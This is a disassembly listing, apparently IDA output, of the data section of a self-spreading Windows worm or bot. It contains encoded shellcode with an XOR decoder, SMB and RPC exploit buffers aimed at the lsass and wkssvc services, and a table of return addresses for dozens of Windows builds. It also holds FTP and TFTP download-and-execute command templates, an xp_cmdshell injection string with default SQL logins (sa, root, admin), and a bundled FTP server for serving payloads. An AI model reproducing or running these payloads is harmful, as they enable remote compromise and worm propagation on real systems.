dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4263C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_404737+85�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_426454 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404737+B1�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_426500 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_404737+D8�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4265E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_4042F8+8A�o
unicode 0, <C$>,0
a?????_0 db '?????',0
dd 0
dword_426644 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4266B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_426754 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4267D4 dd offset loc_401495 ; DATA XREF: sub_4042F8+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_426868 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4268D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4042F8+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_426948 dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_426A08 dd 1004600h ; sub_4042F8+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_404197+BE�o
db 'it >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_404197+97�o
unk_426B40 db 2 ; DATA XREF: sub_404737+17D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 25h, 73h, 2Eh
db 65h ; e
db 1Fh, 78h, 1Fh
db 70h ; p
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aTryingToRoot_0 db ' trying to root %s',0
align 4
unk_426B6C db 2 ; DATA XREF: sub_404969+22A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 73h, 71h
db 6Ch ; l
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAttemptingToRo db ' attempting to root (%s:%d) user: (%s/%s).',0
unk_426BB0 db 2 ; DATA XREF: sub_404969+1AB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 74h, 70h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileTransferCo db ' File transfer complete to IP: %s',0
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'%s',27h,0 ; DATA XREF: sub_404969+196�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us'
; DATA XREF: sub_404969+162�o
db 'er %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq '
db '&%s&del eq',0Dh,0Ah
db 27h,0
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_404969+C6�o
align 10h
aAdmin db 'admin',0 ; DATA XREF: sub_404969+2B�o
; ___:0042EF04�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_404969+24�o
; ___:0042EF0C�o ...
align 10h
aSa db 'sa',0 ; DATA XREF: sub_404969+19�o
align 4
dd 0C933FA8Bh, 909035B2h, 0C1816690h, 0C7830138h
db 1Ah
; ---------------------------------------------------------------------------
loc_426CF5: ; CODE XREF: ___:00426CFC�j
mov bl, [edi]
xor bl, dl
mov [edi], bl
inc edi
loop loc_426CF5
ficom word ptr [esi]
dec edi
pop esp
aaa
xor [ecx+6Ch], bl
; ---------------------------------------------------------------------------
dw 28CDh
dd 0E4B9EBA9h, 36E14579h, 151512C5h, 66623D05h, 7066A07h
dd 7979711Bh, 0DD30DE34h, 0CACACACCh, 1FD8B668h, 516C055Fh
dd 75BE34BEh, 2945BE39h, 3D4DBE98h, 0BE096AB8h, 0BECE342Eh
dd 0CE344D6Eh, 34297EBEh, 1166BECCh, 6466CF34h, 156EBE67h
dd 0FC04CE34h, 0ACF50474h, 34BE01BEh, 0F70499CBh, 0F5B1D7E4h
dd 833AC240h, 71B83070h, 0C533170h, 53D44025h, 6D6F2504h
dd 6765636Bh, 74257B1Eh, 7F39823Ah, 34BD31BEh, 78833ACDh
dd 0B871BC30h, 3078CBEDh, 78CB8B40h, 0CB144131h, 68B81778h
dd 0E5CA662Dh, 315FF2BCh, 3070BD6Dh, 3F4270B5h, 0B54168B8h
dd 0DC21135Eh, 0CACACA4Dh, 0EE04FBBCh, 66666666h, 0CA637363h
dd 6D60A2E5h, 5F05BC53h, 0CA626025h, 637BE160h, 0F960CA62h
dd 0CA626066h, 0B8A2E560h, 0CA65BD70h, 6060D160h, 0B8DD60CAh
dd 0A1393071h, 501B5D66h, 695D504Dh, 0A1515856h, 70B8E704h
dd 6262A1F9h, 0CB666662h, 67C734F3h, 4D70B8A1h, 0BD70B865h
dd 663D8465h, 0CB255F66h, 666667FBh, 60CA6066h, 0CACA5FD9h
dd 0D560h, 7A69h, 0
dword_426E40 dd 0D0EC8166h, 7dword_426E48 dd 129F74h, 0 dword_426E50 dd 127D78h, 0
; =============== S U B R O U T I N E =======================================
sub_426E58 proc near ; DATA XREF: sub_404D78+D5�o
; FUNCTION CHUNK AT 00426E5E SIZE 00000047 BYTES
pusha
jmp short loc_426E5E
sub_426E58 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426E5B proc near ; CODE XREF: sub_426E58:loc_426E5E�p
pop ebx
push ebx
retn
sub_426E5B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E58
loc_426E5E: ; CODE XREF: sub_426E58+1�j
call sub_426E5B
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_426E6B: ; CODE XREF: sub_426E58+3C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_426E6B
popa
loc_426E97: ; DATA XREF: sub_404D78+B4�r
add [edi+edi*2+31430042h], dh
loc_426E9E: ; DATA XREF: sub_404D78+AE�r
mov ebp, 7FC77h
loc_426EA3: ; DATA XREF: sub_404D78:loc_405043�r
; sub_404D78+2F2�r ...
add [ecx], al
; END OF FUNCTION CHUNK FOR sub_426E58
; ---------------------------------------------------------------------------
db 3 dup(0)
dd offset aWindowsXpSp01E ; "Windows XP SP0+1 ENG"
db 43h
; ---------------------------------------------------------------------------
loc_426EAD: ; CODE XREF: ___:00426EAF�j
xor eax, eax
ja short loc_426EAD
pop es
; ---------------------------------------------------------------------------
dw 0
dd 1, 427F88h, 77BD1F89h, 7FCh, 1, 427F74h, 77BD1FA8h
dd 7FCh, 1, 427F60h, 77BD1FD6h, 7FCh, 1, 427F4Ch, 77BD2195h
dd 7FCh, 1, 427F38h, 77BD21B3h, 7FCh, 1, 427F24h, 77BD21E0h
dd 7FCh, 1, 427F10h, 77BD220Ch, 7FCh, 1, 427EFCh, 77BD2241h
dd 7FCh, 1, 427EE8h, 77BD22D2h, 7FCh, 1, 427ED4h, 77BD28B2h
dd 7FCh, 1, 427EC0h, 77BD29ABh, 7FCh, 1, 427EACh, 77BD29E7h
dd 7FCh, 1, 427E98h, 77BD29F7h, 7FCh, 1, 427E84h, 77BD2A03h
dd 7FCh, 1, 427E70h, 77BD2D6Dh, 7FCh, 1, 427E5Ch, 77BD2DB3h
dd 7FCh, 1, 427E48h, 77BD2EC2h, 7FCh, 1, 427E34h, 77BD2EDDh
dd 7FCh, 1, 427E20h, 77BD30AFh, 7FCh, 1, 427E0Ch, 77BD312Bh
dd 7FCh, 1, 427DF8h, 77BD3160h, 7FCh, 1, 427DE4h, 77BD349Ah
dd 7FCh, 1, 427DD0h, 77BD34E4h, 7FCh, 1, 427DB4h, 655B4F02h
dd 7E7h, 0
dd offset aWindowsUkXpPro ; "Windows uk xp pro sp1 1"
dd 77C01F89h, 7FCh, 1, 427D84h, 77C01FA8h, 7FCh, 1, 427D6Ch
dd 77C01FD6h, 7FCh, 1, 427D54h, 77C02195h, 7FCh, 1, 427D3Ch
dd 77C021B3h, 7FCh, 1, 427D24h, 77C021E0h, 7FCh, 1, 427D0Ch
dd 77C0220Ch, 7FCh, 1, 427CF4h, 77C02241h, 7FCh, 1, 427CDCh
dd 77C022D2h, 7FCh, 1, 427CC0h, 77C028B2h, 7FCh, 1, 427CA4h
dd 77C029ABh, 7FCh, 1, 427C88h, 77C029E7h, 7FCh, 1, 427C6Ch
dd 77C029F7h, 7FCh, 1, 427C50h, 77C02A03h, 7FCh, 1, 427C34h
dd 77C02A39h, 7FCh, 1, 427C18h, 77C02D6Dh, 7FCh, 1, 427BFCh
dd 77C02DB3h, 7FCh, 1, 427BE0h, 77C02EC2h, 7FCh, 1, 427BC4h
dd 77C02EDDh, 7FCh, 1, 427BA8h, 77C030AFh, 7FCh, 1, 427B8Ch
dd 77C0312Bh, 7FCh, 1, 427B70h, 77C03143h, 7FCh, 1, 427B54h
dd 77C03160h, 7FCh, 1, 427B38h, 77C0349Ah, 7FCh, 1, 427B1Ch
dd 77C034E4h, 7FCh, 1, 427B04h, 77B920FDh, 7FCh, 1, 427AECh
dd 77B9211Ch, 7FCh, 1, 427AD4h, 77B9214Ah, 7FCh, 1, 427ABCh
dd 77B9230Ch, 7FCh, 1, 427AA4h, 77B9232Ah, 7FCh, 1, 427A8Ch
dd 77B92357h, 7FCh, 1, 427A74h, 77B92383h, 7FCh, 1, 427A5Ch
dd 77B923B8h, 7FCh, 1, 427A44h, 77B92448h, 7FCh, 1, 427A28h
dd 77B92AAAh, 7FCh, 1, 427A0Ch, 77B92BA7h, 7FCh, 1, 4279F0h
dd 77B92BE3h, 7FCh, 1, 4279D4h, 77B92BF3h, 7FCh, 1, 4279B8h
dd 77B92BFFh, 7FCh, 1, 42799Ch, 77B92F78h, 7FCh, 1, 427980h
dd 77B92FBEh, 7FCh, 1, 427964h, 77B930EFh, 7FCh, 1, 427948h
dd 77B9310Dh, 7FCh, 1, 42792Ch, 77B9330Ch, 7FCh, 1, 427910h
dd 77B93388h, 7FCh, 1, 4278F4h, 77B9339Eh, 7FCh, 1, 4278D8h
dd 77B933BAh, 7FCh, 1, 4278BCh, 77B9373Dh, 7FCh, 1, 4278A0h
dd 77B9378Ah, 7FCh, 1, 427888h, 77B920FDh, 7FCh, 1, 427870h
dd 77B9211Ch, 7FCh, 1, 427858h, 77B9214Ah, 7FCh, 1, 427840h
dd 77B9230Ch, 7FCh, 1, 427828h, 77B9232Ah, 7FCh, 1, 427810h
dd 77B92357h, 7FCh, 1, 4277F8h, 77B92383h, 7FCh, 1, 4277E0h
dd 77B923B8h, 7FCh, 1, 4277C8h, 77B92448h, 7FCh, 1, 4277ACh
dd 77B92AAAh, 7FCh, 1, 427790h, 77B92BA7h, 7FCh, 1, 427774h
dd 77B92BE3h, 7FCh, 1, 427758h, 77B92BF3h, 7FCh, 1, 42773Ch
dd 77B92BFFh, 7FCh, 1, 427720h, 77B92F78h, 7FCh, 1, 427704h
dd 77B92FBEh, 7FCh, 1, 4276E8h, 77B930EFh, 7FCh, 1, 4276CCh
dd 77B9310Dh, 7FCh, 1, 4276B0h, 77B9330Ch, 7FCh, 1, 427694h
dd 77B93388h, 7FCh, 1, 427678h, 77B9339Eh, 7FCh, 1, 42765Ch
dd 77B933BAh, 7FCh, 1, 427640h, 77B9373Dh, 7FCh, 1, 427624h
dd 77B9378Ah, 7FCh, 1, 427618h, 41414141h, 7FCh, 1, 427600h
dd 77E14C29h, 7FCh, 1, 4275E8h, 77E3CB4Ch, 7FCh, 1, 4275D0h
dd 77E42C75h, 7FCh, 1, 4275B8h, 77E3C256h, 7FCh, 1, 4275A0h
dd 77E2AFC5h, 7FCh, 1, 427588h, 77E2492Bh, 7FCh, 1, 427570h
dd 77E4FF15h, 7FCh, 1, 427558h, 77E33F4Dh, 7FCh, 1, 326E6957h
dd 5053204Bh, 72462030h, 50206D6Fh, 54546168h, 312079h
dd 326E6957h, 5053204Bh, 72462031h, 50206D6Fh, 54546168h
dd 322079h, 326E6957h, 5053204Bh, 72462032h, 50206D6Fh
dd 54546168h, 312079h, 326E6957h, 5053204Bh, 72462033h
dd 50206D6Fh, 54546168h, 312079h, 326E6957h, 5053204Bh
dd 72462034h, 50206D6Fh, 54546168h, 332079h, 326E6957h
dd 5053204Bh, 72462034h, 50206D6Fh, 54546168h, 322079h
dd 326E6957h, 5053204Bh, 72462031h, 50206D6Fh, 54546168h
dd 312079h, 326E6957h, 5053204Bh, 72462034h, 50206D6Fh
dd 54546168h, 312079h, 20536F44h, 41205058h, 4C4Ch, 646E6957h
dd 2073776Fh, 32206B75h, 6520336Bh, 70732065h, 34322030h
dd 0
aWindowsUk2k3Ee db 'Windows uk 2k3 ee sp0 23',0
align 4
aWindowsUk2k3_0 db 'Windows uk 2k3 ee sp0 22',0
align 4
aWindowsUk2k3_1 db 'Windows uk 2k3 ee sp0 21',0
align 4
aWindowsUk2k3_2 db 'Windows uk 2k3 ee sp0 20',0
align 10h
aWindowsUk2k3_3 db 'Windows uk 2k3 ee sp0 19',0
align 4
aWindowsUk2k3_4 db 'Windows uk 2k3 ee sp0 18',0
align 4
aWindowsUk2k3_5 db 'Windows uk 2k3 ee sp0 17',0
align 4
aWindowsUk2k3_6 db 'Windows uk 2k3 ee sp0 16',0
align 10h
aWindowsUk2k3_7 db 'Windows uk 2k3 ee sp0 15',0
align 4
aWindowsUk2k3_8 db 'Windows uk 2k3 ee sp0 14',0
align 4
aWindowsUk2k3_9 db 'Windows uk 2k3 ee sp0 13',0
align 4
aWindowsUk2k_10 db 'Windows uk 2k3 ee sp0 12',0
align 10h
aWindowsUk2k_11 db 'Windows uk 2k3 ee sp0 11',0
align 4
aWindowsUk2k_12 db 'Windows uk 2k3 ee sp0 10',0
align 4
aWindowsUk2k_13 db 'Windows uk 2k3 ee sp0 9',0
aWindowsUk2k_14 db 'Windows uk 2k3 ee sp0 8',0
aWindowsUk2k_15 db 'Windows uk 2k3 ee sp0 7',0
aWindowsUk2k_16 db 'Windows uk 2k3 ee sp0 6',0
aWindowsUk2k_17 db 'Windows uk 2k3 ee sp0 5',0
aWindowsUk2k_18 db 'Windows uk 2k3 ee sp0 4',0
aWindowsUk2k_19 db 'Windows uk 2k3 ee sp0 3',0
aWindowsUk2k_20 db 'Windows uk 2k3 ee sp0 2',0
aWindowsUk2k_21 db 'Windows uk 2k3 ee sp0 1',0
aWindowsUk2k3Se db 'Windows uk 2k3 se sp0 24',0
align 4
aWindowsUk2k_22 db 'Windows uk 2k3 se sp0 23',0
align 4
aWindowsUk2k_23 db 'Windows uk 2k3 se sp0 22',0
align 4
aWindowsUk2k_24 db 'Windows uk 2k3 se sp0 21',0
align 10h
aWindowsUk2k_25 db 'Windows uk 2k3 se sp0 20',0
align 4
aWindowsUk2k_26 db 'Windows uk 2k3 se sp0 19',0
align 4
aWindowsUk2k_27 db 'Windows uk 2k3 se sp0 18',0
align 4
aWindowsUk2k_28 db 'Windows uk 2k3 se sp0 17',0
align 10h
aWindowsUk2k_29 db 'Windows uk 2k3 se sp0 16',0
align 4
aWindowsUk2k_30 db 'Windows uk 2k3 se sp0 15',0
align 4
aWindowsUk2k_31 db 'Windows uk 2k3 se sp0 14',0
align 4
aWindowsUk2k_32 db 'Windows uk 2k3 se sp0 13',0
align 10h
aWindowsUk2k_33 db 'Windows uk 2k3 se sp0 12',0
align 4
aWindowsUk2k_34 db 'Windows uk 2k3 se sp0 11',0
align 4
aWindowsUk2k_35 db 'Windows uk 2k3 se sp0 10',0
align 4
aWindowsUk2k_36 db 'Windows uk 2k3 se sp0 9',0
aWindowsUk2k_37 db 'Windows uk 2k3 se sp0 8',0
aWindowsUk2k_38 db 'Windows uk 2k3 se sp0 7',0
aWindowsUk2k_39 db 'Windows uk 2k3 se sp0 6',0
aWindowsUk2k_40 db 'Windows uk 2k3 se sp0 5',0
aWindowsUk2k_41 db 'Windows uk 2k3 se sp0 4',0
aWindowsUk2k_42 db 'Windows uk 2k3 se sp0 3',0
aWindowsUk2k_43 db 'Windows uk 2k3 se sp0 2',0
aWindowsUk2k_44 db 'Windows uk 2k3 se sp0 1',0
aWindowsUkXpP_0 db 'Windows uk xp pro sp1 25',0
align 4
aWindowsUkXpP_1 db 'Windows uk xp pro sp1 24',0
align 4
aWindowsUkXpP_2 db 'Windows uk xp pro sp1 23',0
align 10h
aWindowsUkXpP_3 db 'Windows uk xp pro sp1 22',0
align 4
aWindowsUkXpP_4 db 'Windows uk xp pro sp1 21',0
align 4
aWindowsUkXpP_5 db 'Windows uk xp pro sp1 20',0
align 4
aWindowsUkXpP_6 db 'Windows uk xp pro sp1 19',0
align 10h
aWindowsUkXpP_7 db 'Windows uk xp pro sp1 18',0
align 4
aWindowsUkXpP_8 db 'Windows uk xp pro sp1 17',0
align 4
aWindowsUkXpP_9 db 'Windows uk xp pro sp1 16',0
align 4
aWindowsUkXp_10 db 'Windows uk xp pro sp1 15',0
align 10h
aWindowsUkXp_11 db 'Windows uk xp pro sp1 14',0
align 4
aWindowsUkXp_12 db 'Windows uk xp pro sp1 13',0
align 4
aWindowsUkXp_13 db 'Windows uk xp pro sp1 12',0
align 4
aWindowsUkXp_14 db 'Windows uk xp pro sp1 11',0
align 10h
aWindowsUkXp_15 db 'Windows uk xp pro sp1 10',0
align 4
aWindowsUkXp_16 db 'Windows uk xp pro sp1 9',0
aWindowsUkXp_17 db 'Windows uk xp pro sp1 8',0
aWindowsUkXp_18 db 'Windows uk xp pro sp1 7',0
aWindowsUkXp_19 db 'Windows uk xp pro sp1 6',0
aWindowsUkXp_20 db 'Windows uk xp pro sp1 5',0
aWindowsUkXp_21 db 'Windows uk xp pro sp1 4',0
aWindowsUkXp_22 db 'Windows uk xp pro sp1 3',0
aWindowsUkXp_23 db 'Windows uk xp pro sp1 2',0
aWindowsUkXpPro db 'Windows uk xp pro sp1 1',0 ; DATA XREF: ___:00427038�o
aWindows2000Sp4 db 'Windows 2000 SP4 GER FAT32',0
align 10h
aWindowsNlSp123 db 'Windows nl sp1 23',0
align 4
aWindowsNlSp122 db 'Windows nl sp1 22',0
align 4
aWindowsNlSp121 db 'Windows nl sp1 21',0
align 4
aWindowsNlSp120 db 'Windows nl sp1 20',0
align 10h
aWindowsNlSp119 db 'Windows nl sp1 19',0
align 4
aWindowsNlSp118 db 'Windows nl sp1 18',0
align 4
aWindowsNlSp117 db 'Windows nl sp1 17',0
align 4
aWindowsNlSp116 db 'Windows nl sp1 16',0
align 10h
aWindowsNlSp115 db 'Windows nl sp1 15',0
align 4
aWindowsNlSp114 db 'Windows nl sp1 14',0
align 4
aWindowsNlSp113 db 'Windows nl sp1 13',0
align 4
aWindowsNlSp112 db 'Windows nl sp1 12',0
align 10h
aWindowsNlSp111 db 'Windows nl sp1 11',0
align 4
aWindowsNlSp110 db 'Windows nl sp1 10',0
align 4
aWindowsNlSp19 db 'Windows nl sp1 9',0
align 4
aWindowsNlSp18 db 'Windows nl sp1 8',0
align 10h
aWindowsNlSp17 db 'Windows nl sp1 7',0
align 4
aWindowsNlSp16 db 'Windows nl sp1 6',0
align 4
aWindowsNlSp15 db 'Windows nl sp1 5',0
align 4
aWindowsNlSp14 db 'Windows nl sp1 4',0
align 10h
aWindowsNlSp13 db 'Windows nl sp1 3',0
align 4
aWindowsNlSp12 db 'Windows nl sp1 2',0
align 4
aWindowsNlSp11 db 'Windows nl sp1 1',0
align 4
aWindowsXpSp01E db 'Windows XP SP0+1 ENG',0 ; DATA XREF: ___:00426EA8�o
align 4
aWindowsXpSp01G db 'Windows XP SP0+1 GER+NL+IT+FR',0
align 4
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_404D78+4E8�o
align 10h
dword_427FF0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0dword_428004 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_404D78+243�o
aSPipeWkssvc db '\\%s\pipe\wkssvc',0 ; DATA XREF: sub_404D78+1E4�o
align 4
a_: ; DATA XREF: sub_404D78+184�o
; sub_4062F7+24D�o ...
unicode 0, <.>,0
aS_1 db '\\%s',0 ; DATA XREF: sub_404D78+153�o
align 4
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_405350+5CD�o
aQuit db 'QUIT',0 ; DATA XREF: sub_405350+5B9�o
; sub_40F6F1+537�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_405350+5AC�o
align 10h
unk_428080 db 2 ; DATA XREF: sub_405350+561�o
db 52h, 2 dup(4Fh)
db 54h ; T
db 45h, 44h, 2
aSPortDNowExecu db ' »» %s, port:%d now executing %s on remote machine.',0
align 10h
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_405350+542�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_405350+516�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_405350+4FE�o
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_405350+4E9�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_405350+4D8�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_405350+4A5�o
align 10h
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_405350+464�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_405350+42B�o
align 10h
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_405350+3FD�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_405350+3EA�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_405350+3AF�o
align 4
aPasv db 'PASV',0 ; DATA XREF: sub_405350+39C�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_405350+38C�o
aI: ; DATA XREF: sub_405350+378�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_405350+351�o
aA: ; DATA XREF: sub_405350+33D�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_405350+326�o
; sub_405350+361�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_405350+316�o
align 4
off_42821C dd offset dword_445750 ; DATA XREF: sub_405350+302�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_405350+2F2�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_405350+2DE�o
align 4
a215Nzmxftpd db '215 NzmxFtpd',0Ah,0 ; DATA XREF: sub_405350+2CE�o
align 4
aSyst db 'SYST',0 ; DATA XREF: sub_405350+2BA�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_405350+2AA�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_405350+296�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_405350+286�o
align 4
aUser_1 db 'USER',0 ; DATA XREF: sub_405350+271�o
; ___:0042EFA8�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_405350+260�o
align 4
a220Nzmxftpd0wn db '220 NzmxFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_405350+1D8�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4059D0+24�o
; sub_406B85+12E�o ...
align 4
